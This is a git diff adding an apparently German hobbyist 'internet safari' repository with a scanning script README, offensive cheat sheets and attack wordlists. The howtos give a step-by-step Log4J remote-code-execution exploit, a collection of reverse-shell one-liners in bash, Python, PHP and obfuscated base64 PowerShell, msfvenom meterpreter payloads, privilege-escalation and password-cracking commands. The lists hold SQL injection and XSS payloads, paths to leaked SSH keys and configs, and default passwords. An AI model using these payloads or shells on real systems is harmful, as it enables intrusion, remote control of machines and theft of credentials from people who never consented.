diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..c36e253 --- /dev/null +++ b/.gitignore @@ -0,0 +1,11 @@ +**.bolt +**.log +*.lock +.vscode/* +.DS_Store +**.DS_Store +bugbounty/* +groups/** +input/** +scans/* +**.resume.cfg \ No newline at end of file diff --git a/BlockZone.ttf b/BlockZone.ttf new file mode 100644 index 0000000..0369147 Binary files /dev/null and b/BlockZone.ttf differ diff --git a/CNAME b/CNAME new file mode 100644 index 0000000..edf4e09 --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +www.1337.observer diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..e32c3dd --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2020 1337core + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000..2a47350 --- /dev/null +++ b/README.md @@ -0,0 +1,28 @@ +## Willkommen bei 1337observer +Hier werden einfache Tools und Listen programmiert, um das Internet zu scannen. + +* Unter /scripts liegt `discover.py`. +* Unter /scans werden standardmäßig die Scans abgelegt. + +# Installation +* Subfinder: https://www.github.com/projectdiscovery/subfinder (MUSS!) +* httpx: https://www.github.com/projectdiscovery/httpx (MUSS!) +* Nuclei: https://www.github.com/projectdiscovery/nuclei (MUSS!) +* Python 3: https://www.python.org/ (MUSS!) + +# Standard Scan: +Das Script `discover.py` automatisiert die Tools. +Man startet mit einer Liste von Domains im Format `domain.de`. + +Im Hauptordner ausführen: +`python3 scripts/discovery.py -i lists/domains.txt -batch yes` + +## Ergebnisse filtern nach Text z.B. Mail, OWA, Wordpress: + +Wer spezielle Server/URLs sucht, kann mit `grep` die Ergebnisse filtern und weiterverarbeiten. +Um alle Mailserver zu checken, die eine erreichbare Webseite haben, filtert man im Ordner "scans" +die Unterordner der Ergebnisse so: + +``` +grep -rih owa */active.txt +``` \ No newline at end of file diff --git a/_config.yml b/_config.yml new file mode 100644 index 0000000..74ac6c5 --- /dev/null +++ b/_config.yml @@ -0,0 +1,9 @@ +theme: jekyll-theme-hacker +plugins: + - jekyll-titles-from-headings + - jekyll-feed +permalink: :title:output_ext +titles_from_headings: + enabled: true + strip_title: false + collections: false diff --git a/_layouts/default.html b/_layouts/default.html new file mode 100644 index 0000000..b01ae4f --- /dev/null +++ b/_layouts/default.html @@ -0,0 +1,29 @@ + + + + + + + + {{ page.title }} + + + + + + +
+ << 1337observer +
+
+ {{ content }} +
+ + + diff --git a/_layouts/frontpage.html b/_layouts/frontpage.html new file mode 100644 index 0000000..908e318 --- /dev/null +++ b/_layouts/frontpage.html @@ -0,0 +1,54 @@ + + + + + + + + 🌍🏄🏻‍♂️👁 1337observer + + + + + + +
+ 
+█▀ ██▀▄▄ █▀▄▄ █▄▄▄ ████▀▀███▀▀███▀▀██▀▀██▀██▀██▀██▀▀██▀██
+██ ████▄▀███▄▀███ ████ ██ █ ▀▀▄█ ▀██ ▀▀█ █ █ ██ █ ▀▀█ █ █
+██ ██▄▀▀ █▄▀▀ ██▌▐██▀█▄▀▀▄█ ▀▀▄█▀▀▄█ ▀▀█ ▄▀█▄▀▄██ ▀▀█ ▄▀█
+
+

Internet-Safari 🦎🦉🦒

+

+ Herzlich Willkommen im Internet. Die wilde Fahrt beginnt gleich! +

+

+ Wir suchen im Web nach interessanten, vergessen Webseiten, Subdomains und Servern. + In diesem Repo sind einige Scripte, Anleitungen und Wortlisten für eine + umfangreiche Entdeckertour! +

+ +

RSS

+ + +

anleitungen

+ + +
+ + + diff --git a/_layouts/post.html b/_layouts/post.html new file mode 100644 index 0000000..5f17f4f --- /dev/null +++ b/_layouts/post.html @@ -0,0 +1,7 @@ +--- +layout: default +--- + +

{{ page.title }}

+ +{{content}} diff --git a/_posts/2022-01-01-Hallo-Welt.md b/_posts/2022-01-01-Hallo-Welt.md new file mode 100644 index 0000000..1ae7c55 --- /dev/null +++ b/_posts/2022-01-01-Hallo-Welt.md @@ -0,0 +1,6 @@ +--- +layout: post +title: "Hallo Welt" +--- + +In diesem Projekt werden Tools und HowTos gesammelt. \ No newline at end of file diff --git a/blockzone-webfont.woff2 b/blockzone-webfont.woff2 new file mode 100644 index 0000000..37ba1cb Binary files /dev/null and b/blockzone-webfont.woff2 differ diff --git a/config/resolver.txt b/config/resolver.txt new file mode 100644 index 0000000..e17f5c4 --- /dev/null +++ b/config/resolver.txt @@ -0,0 +1,9 @@ +9.9.9.9 +1.1.1.1 +8.8.8.8 +8.8.4.4 +84.200.69.80 +84.200.70.40 +85.214.73.63 +208.67.222.222 +208.67.220.220 \ No newline at end of file diff --git a/howtos/encoding.md b/howtos/encoding.md new file mode 100644 index 0000000..e2f0faa --- /dev/null +++ b/howtos/encoding.md @@ -0,0 +1,17 @@ +# Encoding with Linux + + +## string to base64 +``` bash +echo -n "string" | base64 +``` + +## base64 to string +``` bash +echo -n "base64" | base64 -d +``` + +## string to hex +``` bash +echo -n "" | xxd -r -p +``` \ No newline at end of file diff --git a/howtos/hashcat.md b/howtos/hashcat.md new file mode 100644 index 0000000..2300b77 --- /dev/null +++ b/howtos/hashcat.md @@ -0,0 +1,5 @@ +# Hashcat + +``` +hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt +``` \ No newline at end of file diff --git a/howtos/johntheripper.md b/howtos/johntheripper.md new file mode 100644 index 0000000..aa2b8b5 --- /dev/null +++ b/howtos/johntheripper.md @@ -0,0 +1,14 @@ +# John The Ripper + +## generate hash to crack it + +``` bash +/path/other/xls2john excel.xls +zip2john zipfile.zip +``` + +## cracking + +``` bash +john --wordlist=path/wordlist.txt crack.hash +``` \ No newline at end of file diff --git a/howtos/jwt.md b/howtos/jwt.md new file mode 100644 index 0000000..b9d7023 --- /dev/null +++ b/howtos/jwt.md @@ -0,0 +1,5 @@ +# JWT + +``` +python3 jwt_tool.py -T "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWJjZmZjZmJhNWQ3ZTA0NjBiYWYwNDAiLCJuYW1lIjoiYWxleGFsZXgiLCJlbWFpbCI6InJvb3RAcm9vdC5jb20iLCJpYXQiOjE2Mzk3NzYyNTl9.f0vUjLd9Sq9xrODccH5oc2C7PBWMmVuuEDUuLwiJo6c" -S hs256 -p "gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE" +``` \ No newline at end of file diff --git a/howtos/linux-info.md b/howtos/linux-info.md new file mode 100644 index 0000000..f02aaa3 --- /dev/null +++ b/howtos/linux-info.md @@ -0,0 +1,8 @@ +# Linux enum info + +## proc +``` bash +/proc/net/tcp +/proc/sched_debug +/proc/pid/cmdline +``` \ No newline at end of file diff --git a/howtos/linux-root.md b/howtos/linux-root.md new file mode 100644 index 0000000..7fe100a --- /dev/null +++ b/howtos/linux-root.md @@ -0,0 +1,21 @@ +# From user to root +``` bash +find / -perm +6000 2> /dev/null +``` + +## check apps you can run +``` bash +sudo -l +``` + +## root flag +``` bash +command_you_can_run --var-in-there="/root/flag.txt" +``` + +## core dumps +``` bash +ulimit -S -c unlimited +kill -11 pid +cat /var/crash/... +``` \ No newline at end of file diff --git a/howtos/log4j.md b/howtos/log4j.md new file mode 100644 index 0000000..f2a733b --- /dev/null +++ b/howtos/log4j.md @@ -0,0 +1,48 @@ +# Log4J exploit + +## Install and start LDAP server that redirects to your exploit class: +https://github.com/mbechler/marshalsec + +``` +git clone https://github.com/mbechler/marshalsec.git +mvn clean package -DskipTests +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.IP:8000/#Exploit" +``` + +## Save exploit class to Exploit.java: +``` +public class Exploit { + static { + try { + java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP 1337"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +## Compile exploit to Javacode: +``` +javac Exploit.java -source 8 -target 8 +``` + +## Host Javacode with python: +``` +python3 -m http.server +``` + +## Wait for reverse shell: +``` +nc -lnvp 1337 +``` + +## Trigger Log4J to connect with your LDAP: +``` +curl 'http://TARGET:8983/?foo=$\{jndi:ldap://YOUR.IP:1389/Exploit\}' +``` + +``` +${jndi:${lower:l}${lower:d}a${lower:p}://xx.interactsh.com/poc} +${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.xx.interactsh.com/poc} +``` \ No newline at end of file diff --git a/howtos/minimodem.md b/howtos/minimodem.md new file mode 100644 index 0000000..936d4b0 --- /dev/null +++ b/howtos/minimodem.md @@ -0,0 +1,12 @@ +# Minimodem + +## ascii to WAV + +``` bash +echo -n "string" | minimodem -t -f 1200.wav 1200 +``` + +## WAV to ascii +``` bash +minimodem -r -f 1200.wav 1200 +``` diff --git a/howtos/monogdb.md b/howtos/monogdb.md new file mode 100644 index 0000000..a01cc41 --- /dev/null +++ b/howtos/monogdb.md @@ -0,0 +1,8 @@ +# + +``` bash +mongo +show dbs +use dbname +db.dbname.find() +``` \ No newline at end of file diff --git a/howtos/msfvenom.md b/howtos/msfvenom.md new file mode 100644 index 0000000..1c899f6 --- /dev/null +++ b/howtos/msfvenom.md @@ -0,0 +1,8 @@ +# MSFVENOM + + +``` bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe -o /home/kali/Desktop/rs_exploitl.exe +``` + + diff --git a/howtos/nc.md b/howtos/nc.md new file mode 100644 index 0000000..5910ee4 --- /dev/null +++ b/howtos/nc.md @@ -0,0 +1,10 @@ +# NC + +``` bash +nc -nvlp 1337 +``` + +## updgrade shell +``` bash +python -c 'import pty; pty.spawn("/bin/bash")' +``` \ No newline at end of file diff --git a/howtos/nmap.md b/howtos/nmap.md new file mode 100644 index 0000000..846646e --- /dev/null +++ b/howtos/nmap.md @@ -0,0 +1,30 @@ +# NMAP + +## basic scan +``` bash +sudo nmap -sV -sS -sC host +``` + +## SNMP +``` bash +sudo nmap --script=snmp* -sU IP +``` + +## Vulners script +Single target: + +``` bash +nmap -sV --script vulners --script-args mincvss=9 host +``` + +Fast host list: + +``` bash +nmap --top-ports 50 --open -sV -T5 --script vulners --script-args mincvss=9 --stats-every 60s -iL domains.txt -oN nmap.txt +``` + +## nmap searchsploit +``` bash +nmap -sV -sC host -oX host.xml +searchsploit --nmap host.xml +``` diff --git a/howtos/reverse-shell.md b/howtos/reverse-shell.md new file mode 100644 index 0000000..2a12701 --- /dev/null +++ b/howtos/reverse-shell.md @@ -0,0 +1,48 @@ +# Reverse Shells + +## Upgrade shell +``` +python3 -c 'import pty; pty.spawn("/bin/bash")' +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` + +## Bash +``` +bash -c 'bash -i >& /dev/tcp// 0>&1' +bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 +``` + +## SH +``` +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.177 1337 >/tmp/f +rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7Csh+-i+2%3E%261%7Cnc+10.10.14.177+1337+%3E%2Ftmp%2Ff +``` + +## Python +``` +exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') +``` + +## Windows +``` bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` + +## PHP +``` +php -r '$sock=fsockopen("10.10.10.10",9001);exec("bash <&3 >&3 2>&3");' +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` + +## Powershell: +``` +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +``` +powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== +``` + +``` +echo "$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()%" | base64 +``` \ No newline at end of file diff --git a/howtos/searchsploit.md b/howtos/searchsploit.md new file mode 100644 index 0000000..6bad1af --- /dev/null +++ b/howtos/searchsploit.md @@ -0,0 +1,16 @@ +# Searchsploit + +## search +``` bash +searchsploit "linux kernel" +``` + +## show +``` bash +searchsploit -m 7618 +``` + +## copy exploit to current dir +``` bash +searchsploit -m 7618 +``` \ No newline at end of file diff --git a/howtos/tmux.md b/howtos/tmux.md new file mode 100644 index 0000000..1c0b24a --- /dev/null +++ b/howtos/tmux.md @@ -0,0 +1,10 @@ +# Tmux +``` +Control + B +% +``` + +## switch Pane +``` +o +``` \ No newline at end of file diff --git a/howtos/win-raw.md b/howtos/win-raw.md new file mode 100644 index 0000000..8cc25f9 --- /dev/null +++ b/howtos/win-raw.md @@ -0,0 +1,4 @@ +# Windows Raw Files + +Github: https://github.com/volatilityfoundation/volatility + diff --git a/howtos/wpscan.md b/howtos/wpscan.md new file mode 100644 index 0000000..9f7ef24 --- /dev/null +++ b/howtos/wpscan.md @@ -0,0 +1,7 @@ +# WPscan + + +## enumerate +``` bash +wpscan --url url -e vp +``` \ No newline at end of file diff --git a/howtos/xss.md b/howtos/xss.md new file mode 100644 index 0000000..007dff7 --- /dev/null +++ b/howtos/xss.md @@ -0,0 +1,13 @@ +"'> +“”;<“ +"';<" +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +'';!--"=&{()} + + + + +%22%27%3E%3C%68%31%3E%78%73%73%3C%2F%68%31%3E +"'><h1>xss</h1> +"'><h1>xss</h1> \ No newline at end of file diff --git a/howtos/xxe.md b/howtos/xxe.md new file mode 100644 index 0000000..87879cd --- /dev/null +++ b/howtos/xxe.md @@ -0,0 +1,7 @@ +# XXE +XML external entities: + +``` +]> +``` + diff --git a/index.md b/index.md new file mode 100644 index 0000000..4486014 --- /dev/null +++ b/index.md @@ -0,0 +1,4 @@ +--- +layout: frontpage +title: 1337observer +--- diff --git a/lists/blind-sql-injection.txt b/lists/blind-sql-injection.txt new file mode 100644 index 0000000..629aabe --- /dev/null +++ b/lists/blind-sql-injection.txt @@ -0,0 +1,35 @@ +sleep(5)# +1 or sleep(5)# +" or sleep(5)# +' or sleep(5)# +" or sleep(5)=" +' or sleep(5)=' +1) or sleep(5)# +") or sleep(5)=" +') or sleep(5)=' +1)) or sleep(5)# +")) or sleep(5)=" +')) or sleep(5)=' +;waitfor delay '0:0:5'-- +);waitfor delay '0:0:5'-- +';waitfor delay '0:0:5'-- +";waitfor delay '0:0:5'-- +');waitfor delay '0:0:5'-- +");waitfor delay '0:0:5'-- +));waitfor delay '0:0:5'-- +'));waitfor delay '0:0:5'-- +"));waitfor delay '0:0:5'-- +benchmark(10000000,MD5(1))# +1 or benchmark(10000000,MD5(1))# +" or benchmark(10000000,MD5(1))# +' or benchmark(10000000,MD5(1))# +1) or benchmark(10000000,MD5(1))# +") or benchmark(10000000,MD5(1))# +') or benchmark(10000000,MD5(1))# +1)) or benchmark(10000000,MD5(1))# +")) or benchmark(10000000,MD5(1))# +')) or benchmark(10000000,MD5(1))# +ORDER BY SLEEP(5) +ORDER BY SLEEP(5)-- +ORDER BY SLEEP(5)# +waitfor delay '00:00:05' diff --git a/lists/content-types.txt b/lists/content-types.txt new file mode 100644 index 0000000..75a7fd4 --- /dev/null +++ b/lists/content-types.txt @@ -0,0 +1,12 @@ +text/css +text/csv +text/plain +image/png +image/jpeg +image/gif +audio/mp4 +audio/mpeg +audio/ogg +application/rss+xml +application/json +application/javascript \ No newline at end of file diff --git a/lists/dns.txt b/lists/dns.txt new file mode 100644 index 0000000..aeba216 --- /dev/null +++ b/lists/dns.txt @@ -0,0 +1,167 @@ +admin +aws +auth +admins +adm +administrator +administrators +api +app +apps +batch +build +backup +backups +bucket +backend +ci +cvs +corp +demo +dev +devop +devops +data +database +developer +developers +deploy +deployment +cms +shop +prod +test +testing +trace +root +ftp +ssl +files +file +cloud +config +graph +dashboard +migrate +tst +debug +upload +node +node1 +node_1 +dns +mail +mailing +newsletter +transfer +temp +tmp +log +logs +logging +stats +webstats +stat +host +download +server +sip +print +printer +cache +ip +id +login +mobile +payment +web +docker +ext +extranet +git +gitlab +grafana +ident +identity +info +int +intern +internal +portal +live +master +manager +monitor +monitoring +migration +oauth +stage +staging +search +secret +service +services +staff +srv +sbox +sandbox +system +swagger +secure +testings +training +platform +priv +private +production +vpn +vault +vip +uploads +user +wip +ws +www +fonts +sync +apis +code +media +partner +token +widgets +load +forum +player +content +front +pic +embed +support +tracking +calendar +chat +client +community +map +help +db +sso +webshop +register +intranet +main +tickets +partners +plugin +clients +tools +event +graphql +passport +payments +company +reservations +local +newsroom +directory \ No newline at end of file diff --git a/lists/exts.txt b/lists/exts.txt new file mode 100644 index 0000000..0a5e320 --- /dev/null +++ b/lists/exts.txt @@ -0,0 +1,6 @@ +zip +txt +log +logs +bak +backup \ No newline at end of file diff --git a/lists/forced-browsing.txt b/lists/forced-browsing.txt new file mode 100644 index 0000000..0e246a2 --- /dev/null +++ b/lists/forced-browsing.txt @@ -0,0 +1,146 @@ +common +root +lang +default +admin +AUTHORS +languages +include +editor +core +Logs +scripts +user +INSTALL +styles +misc +img +template +js +system +database +libs +api +db +mysql +index +menu +Form +Container +Font +upload +language +data +log +tools +filemanager +cache +uploads +config +app +php +json +modul +temp +error +credits +configs +calendar +tpl +includes +save +image +plugins +pages +public +mail +docs +lib +login +File +Simple +Conf +assets +paste +images +application +view +src +files +plugin +auth +bin +views +Xml +Mssql +Errors +Actions +tmp +models +sql +example +Service +layouts +Server +Filter +Text +helpers +utils +content +demo +frontend +Search +services +doc +advanced +setup +source +media +users +README +langs +asp +rss +help +library +libraries +build +contrib +FAQ +inc +base +ext +examples +javascript +module +old +debug +filters +App_Data +changelog +samples +shared +main +Request +Configuration +forms +tasks +properties +backup +Import +Export +htdocs +interface +objects +Part +State +wiki +metadata +Caching +ini +job +dir +id +bak +store_setup +system_setup \ No newline at end of file diff --git a/lists/http-debug-params.txt b/lists/http-debug-params.txt new file mode 100644 index 0000000..b240aa0 --- /dev/null +++ b/lists/http-debug-params.txt @@ -0,0 +1,24 @@ +test +admin +administrator +adm +auth +root +superuser +debug +access +login +loggedin +session +action +user +dbuser +registration +qa +dev +prod +testing +old +state +error +skip \ No newline at end of file diff --git a/lists/http-headers.txt b/lists/http-headers.txt new file mode 100644 index 0000000..f7b4489 --- /dev/null +++ b/lists/http-headers.txt @@ -0,0 +1,15 @@ +WWW-Authenticate: realm=[, charset="UTF-8"] +Authorization: +ACCEPT-ENCODING +ACCEPT-ENCODXNG +CACHE-CONTROL +PULL +PUT +HOST +USER-AGENT +SET-COOKIE +SET-COOKIE2 +SET-COOKIE +SET-COOKIX +VERSION +REDIRECT \ No newline at end of file diff --git a/lists/http-param.txt b/lists/http-param.txt new file mode 100644 index 0000000..b9c6a79 --- /dev/null +++ b/lists/http-param.txt @@ -0,0 +1,350 @@ +auth +version +lang +year +target +id +image_id +image +img +domain +region +debug +cid +timezone +locale +localeId +ci +logout +group +groupid +origin +product +sort +errorCode +errorMessage +error +username +password +description +url +desc +bid +next +user +code +cmd +rurl +search +searchterm +resource_url +return_url +returnurl +query +q +test +action +state +session +sid +account +accountid +request +request_id +mobile +token +to +from +till +msg +login +0 +access +country +control +menu +d +secret +admin +adm +administrator +manager +language +productId +link +robots +meta +params +param +this +usr +src +window +accountId +body +brandId +bucket +dir +cookie +display +file +footer +header +help +href +item +node +regionId +register +reg +server +showlog +action +page +name +password +url +email +type +username +file +title +code +q +submit +user +token +delete +message +data +mode +order +orange +lang +item_id +key +status +start +charset +squeeze +description +s +group_id +post +excerpt +login +search +content +comment +step +ajax +debug +state +query +f +error +save +sort +format +tab +offset +edit +preview +filter +update +from +view +do +plugin +theme +text +test +path +language +height +logout +pass +dir +show +h +value +filename +redirect +year +group +template +version +subject +m +download +u +confirm +width +w +callback +size +date +source +GLOBALS +op +method +uid +tag +category +target +ids +term +new +locale +author +paged +cat +msg +to +add +reset +d +day +nonce +captcha +output +host +revision +i +xml +db +time +section +image +r +files +tags +users +role +send +fetch +updated +skips +n +check +table +orderby +num +import +html +log +prefix +fields +pwd +pid +month +module +parent +cancel +activate +ip +checked +success +field +desc +case +remove +position +location +extra +count +b +rating +pass2 +hostname +move +hash +dry +cid +ci +body +src +level +generate +g +folder +dbname +option +userid +sql +options +address +activated +cmd +item +server +json +enabled +info +guid +testdata +load +list +stage +history +config +items +link +stylesheet +sid +postid +feed +deactivate +closed +gid +attachments +request +all +upload +sidebar +dbuser +active +session +registration +attached +tid +input +form +admin +service +select +task +submitted +database +filename +dl +catid +userId +lid +inc +init +stats +phpinfo +tableName +itemid +invites +invite +parameters +conf +col +cname +char +ssid +join +eventId +eventid +editid +trace +lists +listid +formid +cfg +adminid +taskId +eventID +eval \ No newline at end of file diff --git a/lists/interesting-names.txt b/lists/interesting-names.txt new file mode 100644 index 0000000..c010616 --- /dev/null +++ b/lists/interesting-names.txt @@ -0,0 +1,235 @@ +adm +admin +administrator +administrators +admins +alpha +api +apis +app +apply +apps +auth +aws +b2b +backend +backup +backups +batch +beta +bucket +build +builder +built +cache +calendar +cfe +chat +check +ci +client +clients +cloud +cms +code +community +company +config +confluence +consul +consumer +content +corp +courses +cvs +dashboard +data +database +db +debug +demo +deploy +deployment +dev +developer +developers +devop +devops +directory +dk8s +dns +docker +download +elasticsearch +embed +event +ext +file +files +fonts +forum +front +ftp +gae +git +github +gitlab +glb +grafana +graph +graphql +help +host +id +ident +identity +info +int +intern +internal +intranet +intuat +ip +jenkins +jira +k8s +kibana +kubectl +kubernete +kubernetes +live +load +local +log +logging +login +logs +logstash +mail +mailing +main +manager +map +master +media +migrate +migration +mobile +mod +module +monitor +monitoring +newsletter +newsroom +nexus +node +node1 +node_1 +nomad +oauth +oauth1 +partner +partners +passport +payment +payments +perf +performance +perfs +phx +pic +platform +player +plugin +portal +prd +preprod +print +printer +priv +private +prod +production +prometheus +public-api +qa +qa1 +qa2 +recruit +register +reservations +root +s3 +sandbox +sbox +scm +search +secret +secure +secure2 +selenoid +server +service +services +shop +sip +slave +slc +snap +sputnik +srv +ssl +sso +st +st1 +st2 +sta +staff +stage +staging +staging1 +staging2 +staging3 +stat +stats +stg +support +svn +swagger +sync +sync1 +system +temp +test +testbed +testing +testings +tickets +tmp +token +tools +trace +tracking +training +transfer +tst +ua +uat +upload +uploads +user +v1 +v2 +v3 +vault +vip +vn +vpn +web +webshop +webstats +widgets +wip +ws +www +www2 \ No newline at end of file diff --git a/lists/leaky-urls.txt b/lists/leaky-urls.txt new file mode 100644 index 0000000..cbfcefb --- /dev/null +++ b/lists/leaky-urls.txt @@ -0,0 +1,58 @@ +.git/config +.gitlab-ci.yml +wp-config.php~ +config.php~ +admin/ +logs/ +cache/ +v2/_catalog +_logs/access.log +_logs/error.log +_log/access.log +_log/error.log +error_log/ +_install/ +_Dockerfile +yaml.log +wwwstat/ +webstat/ +webmin/ +webdav/ +webdav.password +webadmin/ +web.config +web.config.bak +WEB-INF/config.xml +users.ini +user/ +users/ +stats/ +uploadfile.php +update.php +sql.php +sql.ini +settings.php +settings.php.bak +admin/.config +admin/.htaccess +administrator/ +.ssh/id_dsa +.ssh/id_rsa +.ssh/id_rsa~ +.ssh/id_rsa.key +.ssh/id_rsa.key~ +.ssh/authorized_keys +wwwlog/ +install.txt +install.log +ws_ftp.ini +WS_FTP.LOG +wp.zip +www.zip +dump.sql +db.sql +backup.zip +backup.sql +backup.old +data.sql +data.old \ No newline at end of file diff --git a/lists/passwords.txt b/lists/passwords.txt new file mode 100644 index 0000000..f9d403d --- /dev/null +++ b/lists/passwords.txt @@ -0,0 +1,16 @@ +root +toor +admin +nimda +test +guest +gast +info +adm +user +user1 +username +administrator +dev +developer +qa \ No newline at end of file diff --git a/lists/php-filenames.txt b/lists/php-filenames.txt new file mode 100644 index 0000000..7d4e944 --- /dev/null +++ b/lists/php-filenames.txt @@ -0,0 +1,5163 @@ +default.php +index.php +invocactf.php +view.html.php +helper.php +controller.php +frontend.php +backend.php +colorConfig.ini.php +config.php +router.php +view.php +search.php +user.php +menu.php +admin.php +adminlogin.php +addadminuser.php +main.php +header.php +form.php +modules.php +installer.php +footer.php +component.php +navigation.php +xoops_version.php +functions.php +login.php +core.write_file.php +core.rmdir.php +core.rm_auto.php +core.php +core.is_trusted.php +core.is_secure.php +category.php +modifier.upper.php +modifier.strip.php +modifier.spacify.php +modifier.replace.php +modifier.nl2br.php +modifier.lower.php +modifier.indent.php +modifier.escape.php +modifier.default.php +modifier.cat.php +function.popup.php +function.math.php +function.mailto.php +function.fetch.php +function.eval.php +function.debug.php +function.cycle.php +function.counter.php +compiler.assign.php +block.textformat.php +Smarty.class.php +style.php +vars.php +comment.php +newsletter.php +media.php +blockStyle.php +publisher.php +default_items.php +template.php +default_item.php +index2.php +configuration.php +image.php +categories.php +contact.php +content.php +blog_item.php +cache.php +block.php +upload.php +pagination.php +guestbook.php +poll.php +mailmanweb.php +joomla.php +install.php +file.php +articleweb.php +blog.php +mail.php +application.php +PEAR.php +register.php +module.php +list.php +error.php +database.php +banner.php +archive.php +about.php +update.php 